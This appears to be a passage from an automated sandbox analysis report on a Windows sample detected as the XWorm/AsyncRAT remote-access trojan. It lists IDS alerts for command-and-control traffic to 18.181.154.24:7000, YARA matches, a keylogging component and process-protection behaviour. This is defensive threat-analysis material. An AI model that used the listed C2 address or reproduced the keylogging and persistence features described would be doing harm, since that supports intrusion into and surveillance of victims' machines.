              Source: Binary string: System.Core.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 4x nop then jmp 07854F3Ch0_2_078547DE
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 4x nop then jmp 081B41CCh8_2_081B3A6E
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 4x nop then jmp 073241CCh14_2_07323A6E
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 4x nop then jmp 06CA41CCh19_2_06CA3A6E

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 18.181.154.24:7000 -> 192.168.2.4:49735
              Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 18.181.154.24:7000 -> 192.168.2.4:49735
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49735 -> 18.181.154.24:7000
              Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49735 -> 18.181.154.24:7000
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 18.181.154.24
              Source: global trafficTCP traffic: 192.168.2.4:49735 -> 18.181.154.24:7000
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, grjujyNaBLaKbU.exe, 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000013.00000002.1908285352.0000000002479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: 9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.drString found in binary or memory: http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resources
              Source: Amcache.hve.28.drString found in binary or memory: http://upx.sf.net
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

              Operating System Destruction

              barindex
              Protects its processes via BreakOnTermination flag
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: 01 00 00 00 Jump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_0150D57C0_2_0150D57C
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_078562C80_2_078562C8
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_07851D180_2_07851D18
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_078504780_2_07850478
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_078500400_2_07850040
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091F00400_2_091F0040
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091F34B80_2_091F34B8
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FED000_2_091FED00
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FECBC0_2_091FECBC
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FF1380_2_091FF138
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FF1280_2_091FF128
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FF5700_2_091FF570
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FF5600_2_091FF560
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091F34A80_2_091F34A8
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091F66780_2_091F6678
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091F66690_2_091F6669
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 7_2_018F49907_2_018F4990
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 7_2_018F17E87_2_018F17E8
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0109D57C8_2_0109D57C
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_051700068_2_05170006
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_051700408_2_05170040
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_081B55708_2_081B5570
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_081B00408_2_081B0040
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_081B04788_2_081B0478
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_081B1CE18_2_081B1CE1
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_082000408_2_08200040
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_082034B88_2_082034B8
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820ECCE8_2_0820ECCE
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820ED008_2_0820ED00
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820F12A8_2_0820F12A
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820F1388_2_0820F138
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_082034A88_2_082034A8
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820F5618_2_0820F561
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820F5708_2_0820F570
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_082066698_2_08206669
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_082066788_2_08206678
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 13_2_014817E813_2_014817E8
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 13_2_01481E6013_2_01481E60
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_014CD57C14_2_014CD57C
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_073253F814_2_073253F8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0732047814_2_07320478
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0732000614_2_07320006
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0732004014_2_07320040
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_073734B814_2_073734B8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737210614_2_07372106
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737667814_2_07376678
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737666914_2_07376669
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737F57014_2_0737F570
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_073734A814_2_073734A8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737F13814_2_0737F138
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737ED0014_2_0737ED00
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 17_2_02F217E817_2_02F217E8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 17_2_02F21E6017_2_02F21E60
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_0094D57C19_2_0094D57C
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A134B819_2_06A134B8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1210619_2_06A12106
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1666919_2_06A16669
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1667819_2_06A16678
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1664119_2_06A16641
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A134A819_2_06A134A8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1F57019_2_06A1F570
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1F13819_2_06A1F138
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1ED0019_2_06A1ED00
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06CA53F819_2_06CA53F8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06CA1CE119_2_06CA1CE1
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06CA047819_2_06CA0478
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06CA004019_2_06CA0040
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 24_2_028917E824_2_028917E8
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 1852
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715789896.0000000005BC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000000.1668919070.0000000000C40000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNHwE.exeP vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1714031582.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1714407255.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1712988828.000000000127E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1716519696.0000000007890000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3833495488.0000000006119000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 0000000E.00000002.1848769926.0000000000FCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 0000000E.00000002.1851291561.0000000003F78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 0000000E.00000002.1851291561.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 0000000E.00000002.1850299737.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1914378902.000000000690D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameschtasks.exe.muij% vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1910962243.0000000003595000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1908285352.0000000002492000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1908285352.00000000023ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1910962243.0000000003548000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1908285352.0000000002489000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exeBinary or memory string: OriginalFilenameNHwE.exeP vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe.7.drBinary or memory string: OriginalFilenameNHwE.exeP vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 9758xBqgE1azKnB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: grjujyNaBLaKbU.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
